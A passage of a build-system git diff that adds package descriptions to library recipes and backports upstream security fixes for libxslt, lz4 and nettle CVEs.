+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -66,7 +59,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+--
+2.32.0
+
diff --git a/meta/recipes-support/libunwind/libunwind_1.3.1.bb b/meta/recipes-support/libunwind/libunwind_1.3.1.bb
index 037e04c3c0..8ae94a834c 100644
--- a/meta/recipes-support/libunwind/libunwind_1.3.1.bb
+++ b/meta/recipes-support/libunwind/libunwind_1.3.1.bb
@@ -7,6 +7,7 @@ SRC_URI = "http://download.savannah.nongnu.org/releases/libunwind/libunwind-${PV
file://0004-Fix-build-on-mips-musl.patch \
file://0005-ppc32-Consider-ucontext-mismatches-between-glibc-and.patch \
file://0006-Fix-for-X32.patch \
+ file://0001-Fix-compilation-with-fno-common.patch \
"
SRC_URI_append_libc-musl = " file://musl-header-conflict.patch"
diff --git a/meta/recipes-support/liburcu/liburcu_0.11.1.bb b/meta/recipes-support/liburcu/liburcu_0.11.1.bb
index 6a517e6f29..1902415c90 100644
--- a/meta/recipes-support/liburcu/liburcu_0.11.1.bb
+++ b/meta/recipes-support/liburcu/liburcu_0.11.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "Userspace RCU (read-copy-update) library"
+DESCRIPTION = "A userspace RCU (read-copy-update) library. This data \
+synchronization library provides read-side access which scales linearly \
+with the number of cores. "
HOMEPAGE = "http://lttng.org/urcu"
BUGTRACKER = "http://lttng.org/project/issues"
diff --git a/meta/recipes-support/libusb/libusb1_1.0.22.bb b/meta/recipes-support/libusb/libusb1_1.0.22.bb
index 1d9d772575..ffa8f0320c 100644
--- a/meta/recipes-support/libusb/libusb1_1.0.22.bb
+++ b/meta/recipes-support/libusb/libusb1_1.0.22.bb
@@ -1,5 +1,7 @@
SUMMARY = "Userspace library to access USB (version 1.0)"
-HOMEPAGE = "http://libusb.sf.net"
+DESCRIPTION = "A cross-platform library to access USB devices from Linux, \
+macOS, Windows, OpenBSD/NetBSD, Haiku and Solaris userspace."
+HOMEPAGE = "https://libusb.info"
BUGTRACKER = "http://www.libusb.org/report"
SECTION = "libs"
@@ -8,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
BBCLASSEXTEND = "native nativesdk"
-SRC_URI = "${SOURCEFORGE_MIRROR}/libusb/libusb-${PV}.tar.bz2 \
+SRC_URI = "https://github.com/libusb/libusb/releases/download/v${PV}/libusb-${PV}.tar.bz2 \
file://no-dll.patch \
file://run-ptest \
"
diff --git a/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
new file mode 100644
index 0000000000..614047ea7a
--- /dev/null
+++ b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
@@ -0,0 +1,201 @@
+From 50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 12 Jun 2021 20:02:53 +0200
+Subject: [PATCH] Fix use-after-free in xsltApplyTemplates
+
+xsltApplyTemplates without a select expression could delete nodes in
+the source document.
+
+1. Text nodes with strippable whitespace
+
+Whitespace from input documents is already stripped, so there's no
+need to strip it again. Under certain circumstances, xsltApplyTemplates
+could be fooled into deleting text nodes that are still referenced,
+resulting in a use-after-free.
+
+2. The DTD
+
+The DTD was only unlinked, but there's no good reason to do this just
+now. Maybe it was meant as a micro-optimization.
+
+3. Unknown nodes
+
+Useless and dangerous as well, especially with XInclude nodes.
+See https://gitlab.gnome.org/GNOME/libxml2/-/issues/268
+
+Simply stop trying to uselessly delete nodes when applying a template.
+This part of the code is probably a leftover from a time where
+xsltApplyStripSpaces wasn't implemented yet. Also note that
+xsltApplyTemplates with a select expression never tried to delete
+nodes.
+
+Also stop xsltDefaultProcessOneNode from deleting nodes for the same
+reasons.
+
+This fixes CVE-2021-30560.
+
+CVE: CVE-2021-30560
+Upstream-Status: Backport [https://github.com/GNOME/libxslt/commit/50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8.patch]
+Comment: No change in any hunk
+Signed-off-by: Omkar Patil <Omkar.Patil@kpit.com>
+
+---
+ libxslt/transform.c | 119 +++-----------------------------------------
+ 1 file changed, 7 insertions(+), 112 deletions(-)
+
+diff --git a/libxslt/transform.c b/libxslt/transform.c
+index 04522154..3aba354f 100644
+--- a/libxslt/transform.c
++++ b/libxslt/transform.c
+@@ -1895,7 +1895,7 @@ static void
+ xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ xsltStackElemPtr params) {
+ xmlNodePtr copy;
+- xmlNodePtr delete = NULL, cur;
++ xmlNodePtr cur;
+ int nbchild = 0, oldSize;
+ int childno = 0, oldPos;
+ xsltTemplatePtr template;
+@@ -1968,54 +1968,13 @@ xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ return;
+ }
+ /*
+- * Handling of Elements: first pass, cleanup and counting
++ * Handling of Elements: first pass, counting
+ */
+ cur = node->children;
+ while (cur != NULL) {
+- switch (cur->type) {
+- case XML_TEXT_NODE:
+- case XML_CDATA_SECTION_NODE:
+- case XML_DOCUMENT_NODE:
+- case XML_HTML_DOCUMENT_NODE:
+- case XML_ELEMENT_NODE:
+- case XML_PI_NODE:
+- case XML_COMMENT_NODE:
+- nbchild++;
+- break;
+- case XML_DTD_NODE:
+- /* Unlink the DTD, it's still reachable using doc->intSubset */
+- if (cur->next != NULL)
+- cur->next->prev = cur->prev;
+- if (cur->prev != NULL)
+- cur->prev->next = cur->next;
+- break;
+- default:
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltDefaultProcessOneNode: skipping node type %d\n",
+- cur->type));
+-#endif
+- delete = cur;
+- }
++ if (IS_XSLT_REAL_NODE(cur))
++ nbchild++;
+ cur = cur->next;
+- if (delete != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
+-#endif
+- xmlUnlinkNode(delete);
+- xmlFreeNode(delete);
+- delete = NULL;
+- }
+- }
+- if (delete != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
+-#endif
+- xmlUnlinkNode(delete);
+- xmlFreeNode(delete);
+- delete = NULL;
+ }
+
+ /*
+@@ -4864,7 +4823,7 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ xsltStylePreCompPtr comp = (xsltStylePreCompPtr) castedComp;
+ #endif
+ int i;
+- xmlNodePtr cur, delNode = NULL, oldContextNode;
++ xmlNodePtr cur, oldContextNode;
+ xmlNodeSetPtr list = NULL, oldList;
+ xsltStackElemPtr withParams = NULL;
+ int oldXPProximityPosition, oldXPContextSize;
+@@ -4998,73 +4957,9 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ else
+ cur = NULL;
+ while (cur != NULL) {
+- switch (cur->type) {
+- case XML_TEXT_NODE:
+- if ((IS_BLANK_NODE(cur)) &&
+- (cur->parent != NULL) &&
+- (cur->parent->type == XML_ELEMENT_NODE) &&
+- (ctxt->style->stripSpaces != NULL)) {
+- const xmlChar *val;
+-
+- if (cur->parent->ns != NULL) {
+- val = (const xmlChar *)
+- xmlHashLookup2(ctxt->style->stripSpaces,
+- cur->parent->name,
+- cur->parent->ns->href);
+- if (val == NULL) {
+- val = (const xmlChar *)
+- xmlHashLookup2(ctxt->style->stripSpaces,
+- BAD_CAST "*",
+- cur->parent->ns->href);
+- }
+- } else {
+- val = (const xmlChar *)
+- xmlHashLookup2(ctxt->style->stripSpaces,
+- cur->parent->name, NULL);
+- }
+- if ((val != NULL) &&
+- (xmlStrEqual(val, (xmlChar *) "strip"))) {
+- delNode = cur;
+- break;
+- }
+- }
+- /* Intentional fall-through */
+- case XML_ELEMENT_NODE:
+- case XML_DOCUMENT_NODE:
+- case XML_HTML_DOCUMENT_NODE:
+- case XML_CDATA_SECTION_NODE:
+- case XML_PI_NODE:
+- case XML_COMMENT_NODE:
+- xmlXPathNodeSetAddUnique(list, cur);
+- break;
+- case XML_DTD_NODE:
+- /* Unlink the DTD, it's still reachable
+- * using doc->intSubset */
+- if (cur->next != NULL)
+- cur->next->prev = cur->prev;
+- if (cur->prev != NULL)
+- cur->prev->next = cur->next;
+- break;
+- case XML_NAMESPACE_DECL:
+- break;
+- default:
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltApplyTemplates: skipping cur type %d\n",
+- cur->type));
+-#endif
+- delNode = cur;
+- }
++ if (IS_XSLT_REAL_NODE(cur))
++ xmlXPathNodeSetAddUnique(list, cur);
+ cur = cur->next;
+- if (delNode != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltApplyTemplates: removing ignorable blank cur\n"));
+-#endif
+- xmlUnlinkNode(delNode);
+- xmlFreeNode(delNode);
+- delNode = NULL;
+- }
+ }
+ }
+
diff --git a/meta/recipes-support/libxslt/libxslt_1.1.34.bb b/meta/recipes-support/libxslt/libxslt_1.1.34.bb
index 1961bb5b31..4755677bec 100644
--- a/meta/recipes-support/libxslt/libxslt_1.1.34.bb
+++ b/meta/recipes-support/libxslt/libxslt_1.1.34.bb
@@ -1,4 +1,9 @@
SUMMARY = "GNOME XSLT library"
+DESCRIPTION = "libxslt is the XSLT C parser and toolkit developed for the Gnome project. \
+XSLT itself is a an XML language to define transformation for XML. Libxslt is based on \
+libxml2 the XML C library developed for the GNOME project. It also implements most of \
+the EXSLT set of processor-portable extensions functions and some of Saxon's evaluate \
+and expressions extensions."
HOMEPAGE = "http://xmlsoft.org/XSLT/"
BUGTRACKER = "https://bugzilla.gnome.org/"
@@ -9,6 +14,7 @@ SECTION = "libs"
DEPENDS = "libxml2"
SRC_URI = "http://xmlsoft.org/sources/libxslt-${PV}.tar.gz \
+ file://CVE-2021-30560.patch \
"
SRC_URI[md5sum] = "db8765c8d076f1b6caafd9f2542a304a"
@@ -16,6 +22,10 @@ SRC_URI[sha256sum] = "98b1bd46d6792925ad2dfe9a87452ea2adebf69dcb9919ffd55bf926a7
UPSTREAM_CHECK_REGEX = "libxslt-(?P<pver>\d+(\.\d+)+)\.tar"
+# We have libxml2 2.9.10 and we don't link statically with it anyway
+# so this isn't an issue.
+CVE_CHECK_WHITELIST += "CVE-2022-29824"
+
S = "${WORKDIR}/libxslt-${PV}"
BINCONFIG = "${bindir}/xslt-config"
diff --git a/meta/recipes-support/lz4/files/CVE-2021-3520.patch b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
new file mode 100644
index 0000000000..5ac8f6691f
--- /dev/null
+++ b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
@@ -0,0 +1,27 @@
+From 8301a21773ef61656225e264f4f06ae14462bca7 Mon Sep 17 00:00:00 2001
+From: Jasper Lievisse Adriaanse <j@jasper.la>
+Date: Fri, 26 Feb 2021 15:21:20 +0100
+Subject: [PATCH] Fix potential memory corruption with negative memmove() size
+
+Upstream-Status: Backport
+https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7
+CVE: CVE-2021-3520
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ lib/lz4.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: git/lib/lz4.c
+===================================================================
+--- git.orig/lib/lz4.c
++++ git/lib/lz4.c
+@@ -1665,7 +1665,7 @@ LZ4_decompress_generic(
+ const size_t dictSize /* note : = 0 if noDict */
+ )
+ {
+- if (src == NULL) { return -1; }
++ if ((src == NULL) || (outputSize < 0)) { return -1; }
+
+ { const BYTE* ip = (const BYTE*) src;
+ const BYTE* const iend = ip + srcSize;
diff --git a/meta/recipes-support/lz4/lz4_1.9.2.bb b/meta/recipes-support/lz4/lz4_1.9.2.bb
index 6510156ed0..bc11a57eb5 100644
--- a/meta/recipes-support/lz4/lz4_1.9.2.bb
+++ b/meta/recipes-support/lz4/lz4_1.9.2.bb
@@ -1,5 +1,6 @@
SUMMARY = "Extremely Fast Compression algorithm"
DESCRIPTION = "LZ4 is a very fast lossless compression algorithm, providing compression speed at 400 MB/s per core, scalable with multi-cores CPU. It also features an extremely fast decoder, with speed in multiple GB/s per core, typically reaching RAM speed limits on multi-core systems."
+HOMEPAGE = "https://github.com/lz4/lz4"
LICENSE = "BSD | BSD-2-Clause | GPL-2.0"
LIC_FILES_CHKSUM = "file://lib/LICENSE;md5=ebc2ea4814a64de7708f1571904b32cc \
@@ -11,8 +12,13 @@ PE = "1"
SRCREV = "fdf2ef5809ca875c454510610764d9125ef2ebbd"
-SRC_URI = "git://github.com/lz4/lz4.git \
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
+SRC_URI = "git://github.com/lz4/lz4.git;branch=dev;protocol=https \
file://run-ptest \
+ file://CVE-2021-3520.patch \
"
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
@@ -21,7 +27,7 @@ S = "${WORKDIR}/git"
# Fixed in r118, which is larger than the current version.
CVE_CHECK_WHITELIST += "CVE-2014-4715"
-EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no"
+EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' CFLAGS='${CFLAGS}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no"
do_install() {
oe_runmake install
diff --git a/meta/recipes-support/lzo/lzo_2.10.bb b/meta/recipes-support/lzo/lzo_2.10.bb
index 8eefec3cc9..f0c8631aea 100644
--- a/meta/recipes-support/lzo/lzo_2.10.bb
+++ b/meta/recipes-support/lzo/lzo_2.10.bb
@@ -1,4 +1,6 @@
SUMMARY = "Lossless data compression library"
+DESCRIPTION = "A portable lossless data compression library written in \
+ANSI C that offers pretty fast compression and *extremely* fast decompression."
HOMEPAGE = "http://www.oberhumer.com/opensource/lzo/"
SECTION = "libs"
LICENSE = "GPLv2+"
@@ -16,6 +18,8 @@ SRC_URI[sha256sum] = "c0f892943208266f9b6543b3ae308fab6284c5c90e627931446fb49b42
inherit autotools ptest
+CVE_PRODUCT = "lzo oberhumer:lzo2"
+
EXTRA_OECONF = "--enable-shared"
do_install_ptest() {
diff --git a/meta/recipes-support/lzop/lzop_1.04.bb b/meta/recipes-support/lzop/lzop_1.04.bb
index b50c230437..59c2003b74 100644
--- a/meta/recipes-support/lzop/lzop_1.04.bb
+++ b/meta/recipes-support/lzop/lzop_1.04.bb
@@ -5,6 +5,7 @@ gzip are much higher compression and decompression speed at the cost of some \n\
compression ratio. The lzop compression utility was designed with the goals \n\
of reliability, speed, portability and with reasonable drop-in compatibility \n\
to gzip."
+HOMEPAGE = "http://www.lzop.org/"
DEPENDS += "lzo"
LICENSE = "GPLv2+"
diff --git a/meta/recipes-support/mpfr/mpfr_4.0.2.bb b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
index 00c2dc2fe9..0ac73f031f 100644
--- a/meta/recipes-support/mpfr/mpfr_4.0.2.bb
+++ b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
@@ -1,4 +1,5 @@
SUMMARY = "C library for multiple-precision floating-point computations with exact rounding"
+DESCRIPTION = "The GNU Multiple Precision Floating-Point Reliable Library (GNU MPFR) is a GNU portable C library for arbitrary-precision binary floating-point computation with correct rounding, based on GNU Multi-Precision Library. MPFR's computation is both efficient and has a well-defined semantics: the functions are completely specified on all the possible operands and the results do not depend on the platform."
HOMEPAGE = "https://www.mpfr.org/"
LICENSE = "LGPLv3+"
SECTION = "devel"
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
new file mode 100644
index 0000000000..cfc0f382fa
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
@@ -0,0 +1,215 @@
+Backport of:
+
+From a63893791280d441c713293491da97c79c0950fe Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Thu, 11 Mar 2021 19:37:41 +0100
+Subject: [PATCH] New functions ecc_mod_mul_canonical and
+ ecc_mod_sqr_canonical.
+
+* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+New functions.
+* ecc-internal.h: Declare and document new functions.
+* curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
+* curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
+* ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
+* ecc-j-to-a.c (ecc_j_to_a): Likewise.
+* ecc-mul-m.c (ecc_mul_m): Likewise.
+
+(cherry picked from commit 2bf497ba4d6acc6f352bca015837fad33008565c)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-1.patch
+CVE: CVE-2021-20305 dep1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 11 +++++++++++
+ curve25519-eh-to-x.c | 6 +-----
+ curve448-eh-to-x.c | 5 +----
+ ecc-eh-to-a.c | 12 ++----------
+ ecc-internal.h | 15 +++++++++++++++
+ ecc-j-to-a.c | 15 +++------------
+ ecc-mod-arith.c | 24 ++++++++++++++++++++++++
+ ecc-mul-m.c | 6 ++----
+ 8 files changed, 59 insertions(+), 35 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index fd138d82..5cc5c188 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,3 +1,14 @@
+#+2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#+
+#+ * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+#+ New functions.
+#+ * ecc-internal.h: Declare and document new functions.
+#+ * curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
+#+ * curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
+#+ * ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
+#+ * ecc-j-to-a.c (ecc_j_to_a): Likewise.
+#+ * ecc-mul-m.c (ecc_mul_m): Likewise.
+#+
+# 2021-02-17 Niels Möller <nisse@lysator.liu.se>
+#
+# * Released Nettle-3.7.1.
+Index: nettle-3.5.1/curve25519-eh-to-x.c
+===================================================================
+--- nettle-3.5.1.orig/curve25519-eh-to-x.c
++++ nettle-3.5.1/curve25519-eh-to-x.c
+@@ -53,7 +53,6 @@ curve25519_eh_to_x (mp_limb_t *xp, const
+ #define t2 (scratch + 2*ecc->p.size)
+
+ const struct ecc_curve *ecc = &_nettle_curve25519;
+- mp_limb_t cy;
+
+ /* If u = U/W and v = V/W are the coordiantes of the point on the
+ Edwards curve we get the curve25519 x coordinate as
+@@ -69,10 +68,7 @@ curve25519_eh_to_x (mp_limb_t *xp, const
+ ecc->p.invert (&ecc->p, t1, t0, t2 + ecc->p.size);
+
+ ecc_modp_add (ecc, t0, wp, vp);
+- ecc_modp_mul (ecc, t2, t0, t1);
+-
+- cy = mpn_sub_n (xp, t2, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, xp, t2, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, xp, t0, t1, t2);
+ #undef vp
+ #undef wp
+ #undef t0
+Index: nettle-3.5.1/ecc-eh-to-a.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-eh-to-a.c
++++ nettle-3.5.1/ecc-eh-to-a.c
+@@ -59,9 +59,7 @@ ecc_eh_to_a (const struct ecc_curve *ecc
+ /* Needs 2*size + scratch for the invert call. */
+ ecc->p.invert (&ecc->p, izp, zp, tp + ecc->p.size);
+
+- ecc_modp_mul (ecc, tp, xp, izp);
+- cy = mpn_sub_n (r, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r, xp, izp, tp);
+
+ if (op)
+ {
+@@ -81,7 +79,5 @@ ecc_eh_to_a (const struct ecc_curve *ecc
+ }
+ return;
+ }
+- ecc_modp_mul (ecc, tp, yp, izp);
+- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, yp, izp, tp);
+ }
+Index: nettle-3.5.1/ecc-internal.h
+===================================================================
+--- nettle-3.5.1.orig/ecc-internal.h
++++ nettle-3.5.1/ecc-internal.h
+@@ -49,6 +49,8 @@
+ #define ecc_mod_submul_1 _nettle_ecc_mod_submul_1
+ #define ecc_mod_mul _nettle_ecc_mod_mul
+ #define ecc_mod_sqr _nettle_ecc_mod_sqr
++#define ecc_mod_mul_canonical _nettle_ecc_mod_mul_canonical
++#define ecc_mod_sqr_canonical _nettle_ecc_mod_sqr_canonical
+ #define ecc_mod_random _nettle_ecc_mod_random
+ #define ecc_mod _nettle_ecc_mod
+ #define ecc_mod_inv _nettle_ecc_mod_inv
+@@ -263,6 +265,19 @@ ecc_mod_sqr (const struct ecc_modulo *m,
+ #define ecc_modq_mul(ecc, r, a, b) \
+ ecc_mod_mul (&(ecc)->q, (r), (a), (b))
+
++/* These mul and sqr functions produce a canonical result, 0 <= R < M.
++ Requirements on input and output areas are similar to the above
++ functions, except that it is *not* allowed to pass rp = rp +
++ m->size.
++ */
++void
++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp);
++
++void
++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, mp_limb_t *tp);
++
+ /* mod q operations. */
+ void
+ ecc_mod_random (const struct ecc_modulo *m, mp_limb_t *xp,
+Index: nettle-3.5.1/ecc-j-to-a.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-j-to-a.c
++++ nettle-3.5.1/ecc-j-to-a.c
+@@ -51,8 +51,6 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ #define izBp (scratch + 3*ecc->p.size)
+ #define tp scratch
+
+- mp_limb_t cy;
+-
+ if (ecc->use_redc)
+ {
+ /* Set v = (r_z / B^2)^-1,
+@@ -86,17 +84,14 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ ecc_modp_sqr (ecc, iz2p, izp);
+ }
+
+- ecc_modp_mul (ecc, iz3p, iz2p, p);
+- /* ecc_modp (and ecc_modp_mul) may return a value up to 2p - 1, so
+- do a conditional subtraction. */
+- cy = mpn_sub_n (r, iz3p, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r, iz3p, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r, iz2p, p, iz3p);
+
+ if (op)
+ {
+ /* Skip y coordinate */
+ if (op > 1)
+ {
++ mp_limb_t cy;
+ /* Also reduce the x coordinate mod ecc->q. It should
+ already be < 2*ecc->q, so one subtraction should
+ suffice. */
+@@ -106,10 +101,7 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ return;
+ }
+ ecc_modp_mul (ecc, iz3p, iz2p, izp);
+- ecc_modp_mul (ecc, tp, iz3p, p + ecc->p.size);
+- /* And a similar subtraction. */
+- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, iz3p, p + ecc->p.size, iz3p);
+
+ #undef izp
+ #undef up
+Index: nettle-3.5.1/ecc-mod-arith.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-mod-arith.c
++++ nettle-3.5.1/ecc-mod-arith.c
+@@ -119,6 +119,30 @@ ecc_mod_mul (const struct ecc_modulo *m,
+ }
+
+ void
++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp)
++{
++ mp_limb_t cy;
++ mpn_mul_n (tp + m->size, ap, bp, m->size);
++ m->reduce (m, tp + m->size);
++
++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, tp + m->size, m->size);
++}
++
++void
++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, mp_limb_t *tp)
++{
++ mp_limb_t cy;
++ mpn_sqr (tp + m->size, ap, m->size);
++ m->reduce (m, tp + m->size);
++
++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, tp + m->size, m->size);
++}
++
++void
+ ecc_mod_sqr (const struct ecc_modulo *m, mp_limb_t *rp,
+ const mp_limb_t *ap)
+ {
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
new file mode 100644
index 0000000000..bb56b14c8c
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
@@ -0,0 +1,53 @@
+Backport of:
+
+From 971bed6ab4b27014eb23085e8176917e1a096fd5 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 17:26:37 +0100
+Subject: [PATCH] Use ecc_mod_mul_canonical for point comparison.
+
+* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+
+(cherry picked from commit 5b7608fde3a6d2ab82bffb35db1e4e330927c906)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-2.patch
+CVE: CVE-2021-20305 dep2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 4 ++++
+ eddsa-verify.c | 9 ++-------
+ 2 files changed, 6 insertions(+), 7 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 5cc5c188..2a9217a6 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,3 +1,7 @@
+#+2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#+
+#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+#+
+# 2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#
+# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+Index: nettle-3.5.1/eddsa-verify.c
+===================================================================
+--- nettle-3.5.1.orig/eddsa-verify.c
++++ nettle-3.5.1/eddsa-verify.c
+@@ -53,13 +53,8 @@ equal_h (const struct ecc_modulo *p,
+ #define t0 scratch
+ #define t1 (scratch + p->size)
+
+- ecc_mod_mul (p, t0, x1, z2);
+- if (mpn_cmp (t0, p->m, p->size) >= 0)
+- mpn_sub_n (t0, t0, p->m, p->size);
+-
+- ecc_mod_mul (p, t1, x2, z1);
+- if (mpn_cmp (t1, p->m, p->size) >= 0)
+- mpn_sub_n (t1, t1, p->m, p->size);
++ ecc_mod_mul_canonical (p, t0, x1, z2, t0);
++ ecc_mod_mul_canonical (p, t1, x2, z1, t1);
+
+ return mpn_cmp (t0, t1, p->size) == 0;
+
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
new file mode 100644
index 0000000000..15a892ecdf
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
@@ -0,0 +1,122 @@
+Backport of:
+
+From 74ee0e82b6891e090f20723750faeb19064e31b2 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 15:19:19 +0100
+Subject: [PATCH] Fix bug in ecc_ecdsa_verify.
+
+* ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+to compute the scalars used for ecc multiplication.
+* testsuite/ecdsa-verify-test.c (test_main): Add test case that
